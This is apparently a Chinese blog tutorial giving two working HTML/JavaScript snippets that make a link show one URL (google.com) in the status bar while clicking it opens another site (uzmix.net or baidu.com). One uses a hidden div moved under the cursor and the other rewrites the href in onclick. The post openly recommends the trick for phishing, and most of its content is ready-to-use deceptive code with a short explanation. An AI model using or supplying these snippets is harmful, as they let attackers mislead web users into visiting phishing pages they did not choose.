方法一:
先看下面一段代码:
--------------------------------------------------------------------------------------------------------------
<html>
<body>
<div id="open" οnmοuseοver="document.location='http://www.uzmix.net';"
style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
<center>
<br>
<br>
<a href="http://www.google.com" οnclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a>
</html>
--------------------------------------------------------------------------------------------------------------
在IE或者FireFox中执行上面这段代码,当鼠标移动到超链接www.google.com上时,IE和FireFox的状态栏都显示为google的域名,但是当点击超链接时却打开了http://www.uzmix.net。这就实现了一个简单的clickjacking的攻击,用来钓鱼还是不错的。
分析一下代码可以知道,当点击超链接时,执行的函数updatebox(event)将id为open的div移动到了鼠标下面,模拟了一个onmouseover的操作。
方法二:
其实要隐藏状态栏,其实直接使a标签的οnclick=“this.href='http://www.baidu.com'”即可,而且更具有欺骗性。
代码如下:----------------------------------------------------------------------------------------
<html>
<body>
<a href="http://www.google.com"
οnclick="this.href='http://www.baidu.com'">http://www.google.com</a>
</html>
----------------------------------------------------------------------------------------